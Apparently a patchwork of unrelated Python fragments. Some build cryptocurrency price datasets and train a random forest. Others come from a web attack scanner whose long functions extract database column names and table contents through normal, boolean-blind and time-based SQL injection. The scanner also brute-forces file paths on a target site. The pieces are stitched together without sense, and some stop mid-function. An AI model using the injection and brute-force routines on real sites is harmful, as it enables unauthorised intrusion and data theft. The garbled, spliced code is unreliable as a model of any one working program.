'data/datasets/all_merged/excel/{}_faceted.xlsx'.format( _sym.lower()), index=True, index_label='Date') # Add symbol to index index[_sym] = { 'csv': 'data/datasets/all_merged/csv/{}_faceted.csv'.format(_sym.lower()), 'xls': 'data/datasets/all_merged/excel/{}_faceted.xlsx'.format( _sym.lower()), 'target_csv': 'data/datasets/all_merged/csv/{}_target.csv'.format(_sym.lower()), 'target_xls': 'data/datasets/all_merged/excel/{}_target.xlsx'.format( _sym.lower()), 'features': { 'price_history': [c for c in history_facet.columns], 'trend': [c for c in trend_facet.columns], 'volatility': [c for c in volatility_facet.columns], 'volume': [c for c in volume_facet.columns], 'chain': [c for c in chain_facet.columns], } } logger.info('Saved {} in data/datasets/all_merged/'.format(_sym)) with open('data/datasets/all_merged/index_faceted.json', 'w') as f: json.dump(index, f, sort_keys=True, indent=4)
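# NOTE (editor's sketch): downstream code can rebuild a single facet from the
# index written above; the paths mirror the ones used in this module, and 'BTC'
# is an assumed symbol key.
import json
import pandas as pd

with open('data/datasets/all_merged/index_faceted.json') as f:
    faceted_index = json.load(f)

entry = faceted_index['BTC']
df = pd.read_csv(entry['csv'], sep=',', encoding='utf-8',
                 index_col='Date', parse_dates=True)
trend_facet = df[entry['features']['trend']]   # just the trend facet's columns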
def get_content(self, result, database_name, table_name, column_name, limits): # 开始注内容 content_len = 0 logger.debug("Start sqli table %s column %s limit %d content..." % (table_name, column_name, limits)) logger.debug("The sqlirequest is %s, start sqli content..." % self.sqlirequest) if self.sqlimethod == "normal": logger.debug("The sqlimethod is %s..." % self.sqlimethod) # 注这一条的数据长度 logger.debug("Start %dth content length sqli..." % (limits + 1)) content_len = normal_injection(select="length(`" + column_name + "`)", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest ) logger.debug("Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len)) logger.info("[*] content_len: %d" % content_len) # 然后注content logger.debug("Start %dth content sqli..." % (limits + 1)) content = normal_injection(select="`" + column_name + "`", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, isStrings=True, sqlirequest=self.sqlirequest ) logger.debug("Content sqli success...The content is %s..." % content) # 把content return回去,以元组的形式 contents = [column_name, content] logger.info("[*] content: %s" % content) result.put(tuple(contents)) elif self.sqlimethod == "build": logger.debug("The sqlimethod is %s..." % self.sqlimethod) # 然后注content 的 length retVal = build_injection(select="length(`" + column_name + "`)", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) content_len = int(retVal) logger.debug("Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len)) logger.info("[*] content_len: %d" % content_len) # 然后注content名字 # 清空column_name content = "" logger.debug("Start %dth content sqli..." % (limits + 1)) for j in trange(int(content_len), desc='%dth Content sqli' % (limits + 1), leave=False): retVal = build_injection(select="ascii(substring(`" + column_name + "`," + repr(j + 1) + ",1))", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isStrings=True, sqlirequest=self.sqlirequest) content += chr(retVal) logger.debug("Content sqli success...The content is %s..." % content) # 把content return回去,以元组的形式 contents = [column_name, content] logger.info("[*] content: %s" % content) result.put(tuple(contents)) elif self.sqlimethod == "time": logger.debug("The sqlimethod is %s..." % self.sqlimethod) # 然后注content 的length retVal = time_injection(select="length(`" + column_name + "`)", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) content_len = int(retVal) logger.debug("Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len)) logger.info("[*] content_len: %d" % content_len) # 然后注content名字 # 清空column_name content = "" logger.debug("Start %dth content sqli..." % (limits + 1)) for j in trange(int(content_len), desc='%dth Database sqli' % (limits + 1), leave=False): retVal = time_injection(select="ascii(substring(`" + column_name + "`," + repr(j + 1) + ",1))", source=database_name + "." 
+ table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, times=self.time, isStrings=True, sqlirequest=self.sqlirequest) content += chr(retVal) logger.debug("Content sqli success...The content is %s..." % content) # 把content return回去,以元组的形式 contents = [column_name, content] logger.info("[*] content: %s" % content) result.put(tuple(contents)) logger.debug("Sqli table %s column %s limit %d success..." % (table_name, column_name, limits))
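# NOTE (editor's sketch): the boolean ("build") and time-based branches above
# recover one character per request; the SELECT expression they pass to the
# injection helpers for the j-th character of a column value is equivalent to:
column_name, j = 'username', 0   # hypothetical values for illustration
select_expr = "ascii(substring(`" + column_name + "`," + repr(j + 1) + ",1))"
# -> "ascii(substring(`username`,1,1))"; chr() of the recovered code point then
#    rebuilds the content string one character at a time.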
def build_old_dataset(): ohlcv_index = load_preprocessed('ohlcv') cm_index = load_preprocessed('coinmetrics.io') #social_index = load_preprocessed('cryptocompare_social') index = {} for _sym in ohlcv_index.keys(): if not _sym in cm_index: logger.warning('Missing blockchain data for {}'.format(_sym)) continue # if not _sym in social_index: # logger.warning('Missing social data for {}'.format(_sym)) # continue logger.info('Building {}'.format(_sym)) ohlcv = pd.read_csv(ohlcv_index[_sym]['csv'], sep=',', encoding='utf-8', index_col='Date', parse_dates=True) cm = pd.read_csv(cm_index[_sym]['csv'], sep=',', encoding='utf-8', index_col='Date', parse_dates=True) #social = pd.read_csv(social_index[_sym]['csv'], sep=',', encoding='utf-8', # index_col='Date', parse_dates=True) # Build resampled OHLCV and TA features ohlcv_3d = builder.periodic_ohlcv_pct_change(ohlcv, period=3, label=True) ohlcv_7d = builder.periodic_ohlcv_pct_change(ohlcv, period=7, label=True) ohlcv_30d = builder.periodic_ohlcv_pct_change(ohlcv, period=30, label=True) ta = builder.features_ta(ohlcv) ta_3d = builder.period_resampled_ta(ohlcv, period=3) ta_7d = builder.period_resampled_ta(ohlcv, period=7) ta_30d = builder.period_resampled_ta(ohlcv, period=30) # Build Coinmetrics blockchain stats cm_pct = feature_quality_filter(builder.pct_change(cm)) # Build Cryptocompare social stats #social_pct = feature_quality_filter(builder.pct_change(social)) # Build target percent variation target_pct = builder.target_price_variation(ohlcv['close'], periods=1) target_class = builder.target_discrete_price_variation(target_pct) target_labels = builder.target_label(target_class, labels=['SELL', 'HOLD', 'BUY']) target_bin = builder.target_binned_price_variation(target_pct, n_bins=3) target_bin_binary = builder.target_binned_price_variation(target_pct, n_bins=2) target_bin_labels = builder.target_label( target_bin, labels=['SELL', 'HOLD', 'BUY']) target_bin_binary_labels = builder.target_label(target_bin_binary, labels=['SELL', 'BUY']) # Merge all the datasets dataframes = [ ohlcv, ohlcv_3d, ohlcv_7d, ohlcv_30d, ta, ta_3d, ta_7d, ta_30d, cm_pct ] #, social_pct] df = pd.concat(dataframes, axis='columns', verify_integrity=True, sort=True, join='inner') target = pd.concat([ target_pct, target_class, target_bin, target_bin_binary, target_labels, target_bin_labels, target_bin_binary_labels ], axis=1) target.columns = [ 'pct', 'class', 'bin', 'binary_bin', 'labels', 'bin_labels', 'binary_bin_labels' ] target = target.loc[df.first_valid_index():df.last_valid_index()] # Save resulting dataset both in CSV and Excel format logger.info('Saving {}'.format(_sym)) df.to_csv('data/datasets/all_merged/csv/{}.csv'.format(_sym.lower()), sep=',', encoding='utf-8', index=True, index_label='Date') df.to_excel('data/datasets/all_merged/excel/{}.xlsx'.format( _sym.lower()), index=True, index_label='Date') target.to_csv('data/datasets/all_merged/csv/{}_target.csv'.format( _sym.lower()), sep=',', encoding='utf-8', index=True, index_label='Date') target.to_excel('data/datasets/all_merged/excel/{}_target.xlsx'.format( _sym.lower()), index=True, index_label='Date') # Add symbol to index index[_sym] = { 'csv': 'data/datasets/all_merged/csv/{}.csv'.format(_sym.lower()), 'xls': 'data/datasets/all_merged/excel/{}.xlsx'.format(_sym.lower()), 'target_csv': 'data/datasets/all_merged/csv/{}_target.csv'.format(_sym.lower()), 'target_xls': 'data/datasets/all_merged/excel/{}_target.xlsx'.format( _sym.lower()), 'features': { 'ohlcv': [c for c in ohlcv.columns], 'ohlcv_3d': [c for c in 
ohlcv_3d.columns], 'ohlcv_7d': [c for c in ohlcv_7d.columns], 'ohlcv_30d': [c for c in ohlcv_30d.columns], 'ta': [c for c in ta.columns], 'ta_3d': [c for c in ta_3d.columns], 'ta_7d': [c for c in ta_7d.columns], 'ta_30d': [c for c in ta_30d.columns], 'cm_pct': [c for c in cm_pct.columns], #'social_pct': [c for c in social_pct.columns], } } logger.info('Saved {} in data/datasets/all_merged/'.format(_sym)) with open('data/datasets/all_merged/index.json', 'w') as f: json.dump(index, f, sort_keys=True, indent=4)
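# NOTE (editor's sketch): builder.target_price_variation is used above but not
# listed here. A forward-looking percent-variation target consistent with its
# signature (a close series plus a `periods` horizon) could be, as an assumption:
import pandas as pd

def target_price_variation(close, periods=1):
    """Percent change of `close` over the next `periods` rows, aligned to today."""
    return close.pct_change(periods=periods).shift(-periods)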
def update():
    success = False
    NewVersion = getLatestRevision()
    if Version == NewVersion:
        logger.info("Version: {0} is already the latest version".format(Version))
        exit(0)
    elif Version < NewVersion:
        logger.info("Current version: {0}, latest version: {1}".format(Version, NewVersion))
    else:
        logger.info("Version: {0} is already the latest version".format(Version))
        exit(0)
    message = input("Update now? [y/N]")
    if message == "y":
        directory = os.path.abspath(BASE_DIR)
    else:
        exit(0)
    try:
        open(os.path.join(directory, "sWebScanner.py"), "w+b")
    except Exception as ex:
        logger.error("Unable to update the contents of the directory '{0}'".format(ex))
    else:
        for wildcard in ('*', "."):
            # glob.glob matches every file that fits the pattern and returns them as a list
            for _ in glob.glob(os.path.join(directory, wildcard)):
                try:
                    if os.path.isdir(_):
                        shutil.rmtree(_)
                    else:
                        os.remove(_)
                except:
                    pass
        if glob.glob(os.path.join(directory, '*')):
            errMsg = "Unable to clear the contents of the directory '{0}'".format(directory)
            logger.error(errMsg)
        else:
            try:
                archive = urllib.request.urlretrieve(ZIPBALL_PAGE)[0]
                with zipfile.ZipFile(archive) as f:
                    for info in f.infolist():
                        info.filename = re.sub(r"sWebScanner-main/", "", info.filename)
                        if info.filename:
                            f.extract(info, directory)
                filepath = os.path.join(BASE_DIR, "config", "config.py")
                if os.path.isfile(filepath):
                    with open(filepath, 'r', encoding='utf-8') as f:
                        nowVersion = re.search(
                            r"(?m)^Version\s*=\s*['\"]([^'\"]+)", f.read()).group(1)
                    logger.info("Updated to the latest version: {0}".format(nowVersion))
                os.remove(archive)
                success = True
            except Exception as ex:
                logger.error("Sorry!!! The update could not be completed ('{0}')".format(ex))
    if not success:
        logger.info("Please download it again from Github")
        logger.info("Download URL: {0}".format(GIT_REPOSITORY))
def get_columns(self): # 若tables_name未设置,则全跑一遍 if len(self.tables_name) == 0: SqliTables.get_tables(self) # 首先是每个database_name for database_name in self.tables_name: # 每个databases_name声明为一个字典 self.columns_name[database_name] = {} # 每个table_name需要跑一次columns_name for table_name in self.tables_name[database_name]: # 每个table_name中的columns_name声明为一个列表储存 columns_name = [] # 开始跑columns_name logger.debug( "Start sqli databases %s's tables %s's columns..." % (database_name, table_name)) # 先GET if self.sqlirequest == "GET": logger.debug( "The sqlirequest is %s, start sqli columns..." % self.sqlirequest) if self.sqlimethod == "normal": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s column amount sqli..." % table_name) # 先注columns的数量 columns_number = normal_injection( select='COUNT(*)', source="information_schema.columns", conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest) logger.debug( "Columns account sqli success...The columns_number is %d..." % columns_number) logger.info("[*] columns_number: %d" % columns_number) # 每个循环跑一次columns的数据 for i in trange(int(columns_number), desc="Column sqli...", leave=False, disable=True): # 首先是column name的长度 logger.debug("Start %dth column length sqli..." % (i + 1)) column_name_len = normal_injection( select='length(column_name)', source="information_schema.columns", conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest) logger.debug( "%dth Column name length sqli success...The column_name_len is %d..." % ((i + 1), column_name_len)) logger.info("[*] %dth column_name_len: %d" % ((i + 1), column_name_len)) # 然后注columns name column_name = normal_injection( select='column_name', source='information_schema.columns', conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, isStrings=True, sqlirequest=self.sqlirequest) logger.debug( "%dth Column name sqli success...The column_name is %s..." % ((i + 1), column_name)) # 把columns_name插入列表 columns_name.append(column_name) logger.info("[*] %dth column_name: %s" % ((i + 1), column_name)) elif self.sqlimethod == "build": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s column amount sqli..." % table_name) retVal = build_injection( select="COUNT(column_name)", source="information_schema.columns", conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) columns_number = int(retVal) logger.debug( "Columns account sqli success...The columns_number is %d..." % columns_number) logger.info("[*] columns_number: %d" % columns_number) for i in range(0, int(columns_number)): # 然后注 columns_number 的 length logger.debug("Start %dth column length sqli..." % (i + 1)) retVal = build_injection( select="length(column_name)", source="information_schema.columns", conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) column_name_len = int(retVal) logger.debug( "%dth Column name length sqli success...The column_name_len is %d..." 
                                 % ((i + 1), column_name_len))
                    logger.info("[*] %dth column_name_len: %d" % ((i + 1), column_name_len))

                    # Then inject the column name
                    # Reset column_name
                    column_name = ""
                    logger.debug("Start %dth column sqli..." % (i + 1))
                    for j in trange(int(column_name_len), desc='%dth Column sqli' % (i + 1), leave=False):
                        retVal = build_injection(
                            select="ascii(substring(column_name," + repr(j + 1) + ",1))",
                            source="information_schema.columns",
                            conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
                            limit=i, dealpayload=self.dealpayload, data=self.Data, lens=self.len,
                            isStrings=True, sqlirequest=self.sqlirequest)
                        column_name += chr(retVal)
                    logger.debug("%dth Column name sqli success...The column_name is %s..." % ((i + 1), column_name))

                    # Append column_name to the list
                    columns_name.append(column_name)
                    logger.info("[*] %dth column_name: %s" % ((i + 1), column_name))

            elif self.sqlimethod == "time":
                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start table's %s column amount sqli..." % table_name)
                retVal = time_injection(
                    select="COUNT(column_name)", source="information_schema.columns",
                    conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
                    dealpayload=self.dealpayload, data=self.Data, times=self.time,
                    isCount=True, sqlirequest=self.sqlirequest)
                columns_number = int(retVal)
                logger.debug("Columns amount sqli success...The columns_number is %d..." % columns_number)
                logger.info("[*] columns_number: %d" % columns_number)

                for i in range(0, int(columns_number)):
                    # Then inject the length of the column name
                    logger.debug("Start %dth column length sqli..." % (i + 1))
                    retVal = time_injection(
                        select="length(column_name)", source="information_schema.columns",
                        conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
                        limit=i, dealpayload=self.dealpayload, data=self.Data, times=self.time,
                        isCount=True, sqlirequest=self.sqlirequest)
                    column_name_len = int(retVal)
                    logger.debug("%dth Column name length sqli success...The column_name_len is %d..."
                                 % ((i + 1), column_name_len))
                    logger.info("[*] %dth column_name_len: %d" % ((i + 1), column_name_len))

                    # Then inject the column name
                    # Reset column_name
                    column_name = ""
                    logger.debug("Start %dth column sqli..." % (i + 1))
                    for j in trange(int(column_name_len), desc='%dth Column sqli' % (i + 1), leave=False):
                        retVal = time_injection(
                            select="ascii(substring(column_name," + repr(j + 1) + ",1))",
                            source="information_schema.columns",
                            conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
                            limit=i, dealpayload=self.dealpayload, data=self.Data, times=self.time,
                            isStrings=True, sqlirequest=self.sqlirequest)
                        column_name += chr(retVal)
                    logger.debug("%dth Column name sqli success...The column_name is %s..." % ((i + 1), column_name))

                    # Append column_name to the list
                    columns_name.append(column_name)
                    logger.info("[*] %dth column_name: %s" % ((i + 1), column_name))

        # Then handle POST
        elif self.sqlirequest == "POST":
            logger.debug("The sqlirequest is %s, start sqli tables..." % self.sqlirequest)

            if self.sqlimethod == "normal":
                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start table's %s column amount sqli..." % table_name)

                # First inject the number of columns
                columns_number = normal_injection(
                    select='COUNT(*)', source="information_schema.columns",
                    conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
                    dealpayload=self.dealpayload, data=self.Data,
                    isCount=True, sqlirequest=self.sqlirequest)
                logger.debug("Columns amount sqli success...The columns_number is %d..." % columns_number)
                logger.info("[*] columns_number: %d" % columns_number)

                # One pass per column
                for i in trange(int(columns_number), desc="Column sqli...", leave=False, disable=True):
                    # First the length of the column name
                    logger.debug("Start %dth column length sqli..." % (i + 1))
                    column_name_len = normal_injection(
                        select='length(column_name)', source="information_schema.columns",
                        conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
                        limit=i, dealpayload=self.dealpayload, data=self.Data,
                        isCount=True, sqlirequest=self.sqlirequest)
                    logger.debug("%dth Column name length sqli success...The column_name_len is %d..."
                                 % ((i + 1), column_name_len))
                    logger.info("[*] %dth column_name_len: %d" % ((i + 1), column_name_len))

                    # Then inject the column name
                    column_name = normal_injection(
                        select='column_name', source='information_schema.columns',
                        conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
                        limit=i, dealpayload=self.dealpayload, data=self.Data,
                        isStrings=True, sqlirequest=self.sqlirequest)
                    logger.debug("%dth Column name sqli success...The column_name is %s..." % ((i + 1), column_name))

                    # Append column_name to the list
                    columns_name.append(column_name)
                    logger.info("[*] %dth column_name: %s" % ((i + 1), column_name))

            elif self.sqlimethod == "build":
                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start table's %s column amount sqli..." % table_name)
                retVal = build_injection(
                    select="COUNT(column_name)", source="information_schema.columns",
                    conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
                    dealpayload=self.dealpayload, data=self.Data, lens=self.len,
                    isCount=True, sqlirequest=self.sqlirequest)
                columns_number = int(retVal)
                logger.debug("Columns amount sqli success...The columns_number is %d..." % columns_number)
                logger.info("[*] columns_number: %d" % columns_number)

                for i in range(0, int(columns_number)):
                    # Then inject the length of the column name
                    logger.debug("Start %dth column length sqli..." % (i + 1))
                    retVal = build_injection(
                        select="length(column_name)", source="information_schema.columns",
                        conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
                        limit=i, dealpayload=self.dealpayload, data=self.Data, lens=self.len,
                        isCount=True, sqlirequest=self.sqlirequest)
                    column_name_len = int(retVal)
                    logger.debug("%dth Column name length sqli success...The column_name_len is %d..."
                                 % ((i + 1), column_name_len))
                    logger.info("[*] %dth column_name_len: %d" % ((i + 1), column_name_len))

                    # Then inject the column name
                    # Reset column_name
                    column_name = ""
                    logger.debug("Start %dth column sqli..." % (i + 1))
                    for j in trange(int(column_name_len), desc='%dth Column sqli' % (i + 1), leave=False):
                        retVal = build_injection(
                            select="ascii(substring(column_name," + repr(j + 1) + ",1))",
                            source="information_schema.columns",
                            conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
                            limit=i, dealpayload=self.dealpayload, data=self.Data, lens=self.len,
                            isStrings=True, sqlirequest=self.sqlirequest)
                        column_name += chr(retVal)
                    logger.debug("%dth Column name sqli success...The column_name is %s..." % ((i + 1), column_name))

                    # Append column_name to the list
                    columns_name.append(column_name)
                    logger.info("[*] %dth column_name: %s" % ((i + 1), column_name))

            elif self.sqlimethod == "time":
                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start table's %s column amount sqli..." % table_name)
                retVal = time_injection(
                    select="COUNT(column_name)", source="information_schema.columns",
                    conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
                    dealpayload=self.dealpayload, data=self.Data, times=self.time,
                    isCount=True, sqlirequest=self.sqlirequest)
                columns_number = int(retVal)
                logger.debug("Columns amount sqli success...The columns_number is %d..." % columns_number)
                logger.info("[*] columns_number: %d" % columns_number)

                for i in range(0, int(columns_number)):
                    # Then inject the length of the column name
                    logger.debug("Start %dth column length sqli..." % (i + 1))
                    retVal = time_injection(
                        select="length(column_name)", source="information_schema.columns",
                        conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
                        limit=i, dealpayload=self.dealpayload, data=self.Data, times=self.time,
                        isCount=True, sqlirequest=self.sqlirequest)
                    column_name_len = int(retVal)
                    logger.debug("%dth Column name length sqli success...The column_name_len is %d..."
                                 % ((i + 1), column_name_len))
                    logger.info("[*] %dth column_name_len: %d" % ((i + 1), column_name_len))

                    # Then inject the column name
                    # Reset column_name
                    column_name = ""
                    logger.debug("Start %dth column sqli..." % (i + 1))
                    for j in trange(int(column_name_len), desc='%dth Column sqli' % (i + 1), leave=False):
                        retVal = time_injection(
                            select="ascii(substring(column_name," + repr(j + 1) + ",1))",
                            source="information_schema.columns",
                            conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
                            limit=i, dealpayload=self.dealpayload, data=self.Data, times=self.time,
                            isStrings=True, sqlirequest=self.sqlirequest)
                        column_name += chr(retVal)
                    logger.debug("%dth Column name sqli success...The column_name is %s..." % ((i + 1), column_name))

                    # Append column_name to the list
                    columns_name.append(column_name)
                    logger.info("[*] %dth column_name: %s" % ((i + 1), column_name))

        # Store the injected column names as a tuple
        self.columns_name[database_name][table_name] = tuple(columns_name)

        logger.info("Sqli result:")
        # Print all the column names
        for database_name in self.columns_name:
            tables_name = ""
            for table_name in self.columns_name[database_name]:
                tables_name += table_name
                tables_name += ','
                columns_name = ""
                for column_name in self.columns_name[database_name][table_name]:
                    columns_name += column_name
                    columns_name += ','
                logger.info("Table %s has columns %s", table_name, columns_name)
            logger.info("Database %s has tables %s", database_name, tables_name)
        print "[*]Columns list:", self.columns_name
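# --- Hedged illustration (not part of the original tool) ---
# The per-character loops above recover column names one byte at a time via
# ascii(substring(column_name, j+1, 1)). As a minimal sketch of the idea behind a
# boolean-based extraction such as build_injection (an assumption, not this tool's
# actual implementation), the ASCII code of each character can be binary-searched
# with a true/false oracle; send_boolean_payload is a hypothetical placeholder for
# whatever condition test the target permits.
def recover_char(position, send_boolean_payload):
    """Binary-search the ASCII code of one character of column_name."""
    low, high = 32, 126  # printable ASCII range
    while low < high:
        mid = (low + high) // 2
        condition = "ascii(substring(column_name,%d,1)) > %d" % (position, mid)
        if send_boolean_payload(condition):  # True when the injected condition holds
            low = mid + 1
        else:
            high = mid
    return chr(low)
# At most 7 requests per character, versus one request per candidate value in a linear scan.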
def info(message):
    """info log"""
    log.info(message)
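# --- Hedged illustration (not part of the original module) ---
# info() above assumes a module-level `log` object. A minimal sketch of how such a
# logger could be configured with the standard logging module; the logger name and
# format string below are illustrative assumptions, not the project's actual setup.
import logging

log = logging.getLogger("app")
log.setLevel(logging.INFO)
_handler = logging.StreamHandler()
_handler.setFormatter(logging.Formatter("%(asctime)s [%(levelname)s] %(message)s"))
log.addHandler(_handler)

# Usage: info("service started") then delegates to log.info().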
    # Iterate over the list of files we want to try
    for brute in attempt_list:
        url = "%s%s" % (target_url, urllib.quote(brute))
        # print url
        try:
            headers = {}
            headers["User-Agent"] = conf['ua']
            r = urllib2.Request(url, headers=headers)
            # pbar.update(1)
            try:
                response = urllib2.urlopen(r, timeout=2)
            except:
                logger.error("Time out...")
                continue  # the request may hang

            # Sleep after the request completes
            time.sleep(stime)
            if response.code != 404:
                logger.info("Get !!!!" + url)
                tqdm.write("[%d] => %s" % (response.code, url))
        except urllib2.URLError as e:
            if hasattr(e, 'code') and e.code != 404:
                tqdm.write("!!! %d => %s" % (e.code, url))

    logger.info("The dictionary queue is empty")
    pbar.close()
    exit(0)
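# --- Hedged illustration (not part of the original script) ---
# The loop above consumes attempt_list, which is assumed to come from a wordlist.
# A minimal sketch of building such a list from a file, expanding each entry with a
# few common backup extensions; the file name and extension set are hypothetical.
def build_attempt_list(wordlist_path, extensions=(".php", ".bak", ".orig", ".inc")):
    attempts = []
    with open(wordlist_path) as f:
        for line in f:
            word = line.strip()
            if not word:
                continue
            attempts.append("/%s" % word)               # the bare path
            for ext in extensions:
                attempts.append("/%s%s" % (word, ext))  # the path with an extension appended
    return attempts

# attempt_list = build_attempt_list("all.txt")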
def build(source_index, dest_index, W=10):
    ohlcv_index = load_preprocessed('ohlcv')
    cm_index = load_preprocessed('coinmetrics.io')
    index = {}
    for _sym in ohlcv_index.keys():
        if _sym not in cm_index:
            logger.warning('Missing blockchain data for {}'.format(_sym))
            continue
        logger.info('Building {}'.format(_sym))
        ohlcv = pd.read_csv(ohlcv_index[_sym]['csv'], sep=',', encoding='utf-8',
                            index_col='Date', parse_dates=True)
        cm = pd.read_csv(cm_index[_sym]['csv'], sep=',', encoding='utf-8',
                         index_col='Date', parse_dates=True)

        # Build resampled OHLCV and TA features
        ohlcv_3d = builder.periodic_ohlcv_resample(ohlcv, period=3, label=True)
        ohlcv_7d = builder.periodic_ohlcv_resample(ohlcv, period=7, label=True)
        ohlcv_30d = builder.periodic_ohlcv_resample(ohlcv, period=30, label=True)
        ta = builder.features_ta(ohlcv)
        ta_3d = builder.period_resampled_ta(ohlcv, period=3)
        ta_7d = builder.period_resampled_ta(ohlcv, period=7)
        ta_30d = builder.period_resampled_ta(ohlcv, period=30)

        # Build target percent variation
        close = ohlcv['close']
        target_pct = builder.target_price_variation(ohlcv['close'], periods=1)
        target_class = builder.target_discrete_price_variation(target_pct)
        target_binary = builder.target_binary_price_variation(target_pct)
        target_labels = builder.target_label(target_class, labels=['SELL', 'HOLD', 'BUY'])
        target_binary_labels = builder.target_label(target_binary, labels=['SELL', 'BUY'])
        target_bin = builder.target_binned_price_variation(target_pct, n_bins=3)
        target_bin_binary = builder.target_binned_price_variation(target_pct, n_bins=2)
        target_bin_labels = builder.target_label(target_bin, labels=['SELL', 'HOLD', 'BUY'])
        target_bin_binary_labels = builder.target_label(target_bin_binary, labels=['SELL', 'BUY'])

        # Merge all the datasets
        dataframes = [
            ohlcv, ohlcv_3d, ohlcv_7d, ohlcv_30d, ta, ta_3d, ta_7d, ta_30d, cm
        ]  # , social_pct]
        df = pd.concat(dataframes, axis='columns', verify_integrity=True, sort=True, join='inner')
        target = pd.concat([
            close, target_pct, target_class, target_binary, target_bin, target_bin_binary,
            target_labels, target_binary_labels, target_bin_labels, target_bin_binary_labels
        ], axis=1)
        target.columns = [
            'close', 'pct', 'class', 'binary', 'bin', 'binary_bin',
            'labels', 'binary_labels', 'bin_labels', 'binary_bin_labels'
        ]
        target = target.loc[df.first_valid_index():df.last_valid_index()]

        # Save resulting dataset both in CSV and Excel format
        logger.info('Saving {}'.format(_sym))
        feature_groups = {
            'ohlcv': [c for c in ohlcv.columns],
            'ohlcv_3d': [c for c in ohlcv_3d.columns],
            'ohlcv_7d': [c for c in ohlcv_7d.columns],
            'ohlcv_30d': [c for c in ohlcv_30d.columns],
            'ta': [c for c in ta.columns],
            'ta_3d': [c for c in ta_3d.columns],
            'ta_7d': [c for c in ta_7d.columns],
            'ta_30d': [c for c in ta_30d.columns],
            'cm': [c for c in cm.columns],
            # 'social_pct': [c for c in social_pct.columns],
        }
        save_symbol_dataset(dest_index, _sym, df, target=target, feature_groups=feature_groups)
        logger.info('Saved {}'.format(_sym))
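# --- Hedged illustration (not part of the original builder module) ---
# builder.periodic_ohlcv_resample is not shown in this file. A rough pandas sketch of
# what a period-N OHLCV resample with labeled columns could look like (an assumption,
# not the project's actual implementation):
import pandas as pd

def periodic_ohlcv_resample_sketch(ohlcv, period=3, label=True):
    rule = "%dD" % period
    out = pd.DataFrame({
        "open": ohlcv["open"].resample(rule).first(),
        "high": ohlcv["high"].resample(rule).max(),
        "low": ohlcv["low"].resample(rule).min(),
        "close": ohlcv["close"].resample(rule).last(),
        "volume": ohlcv["volume"].resample(rule).sum(),
    })
    if label:
        out.columns = ["%s_%dd" % (c, period) for c in out.columns]
    # Forward-fill back onto the daily index so the frame can be concatenated with daily features
    return out.reindex(ohlcv.index, method="ffill")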
def main():
    index = load_dataset('all_merged', return_index=True)
    resultFile = './data/datasets/all_merged/estimators/randomforest_sfm_hyperparameters.json'
    hyperparameters = {}
    if not os.path.exists(resultFile):
        logger.error('no hyperparameters!')
        return  # nothing to evaluate without the tuned estimators
    with open(resultFile, 'r') as f:
        hyperparameters = json.load(f)
    for _sym, data in index.items():
        if _sym not in hyperparameters or not os.path.exists(hyperparameters[_sym]['estimator']):
            logger.error('{} does not exist.'.format(_sym))
        else:
            features = pd.read_csv(data['csv'], sep=',', encoding='utf-8',
                                   index_col='Date', parse_dates=True)
            # Replace infinity with nan so that it can later be imputed to a finite value
            features = features.replace([np.inf, -np.inf], np.nan)
            # features = features[hyperparameters['feature_importances']]

            # Derive target classes from closing price
            target_pct = target_price_variation(features['close'])
            target = target_binned_price_variation(target_pct, n_bins=2)
            # target = target_discrete_price_variation(target_pct)

            # Split data in train and blind test set with 70:30 ratio.
            # Most ML models don't take sequentiality into account, but our pipeline
            # uses a SimpleImputer with mean strategy, so it's best not to shuffle the data.
            X_train, X_test, y_train, y_test = train_test_split(
                features.values, target.values, shuffle=False, test_size=0.3)

            # Summarize distribution
            print("Training set: # Features {}, # Samples {}".format(X_train.shape[1], X_train.shape[0]))
            plot_class_distribution("Training set", _sym, y_train)
            print("Test set: # Features {}, # Samples {}".format(X_test.shape[1], X_test.shape[0]))
            plot_class_distribution("Test set", _sym, y_test)
            if not np.isfinite(X_train).all():
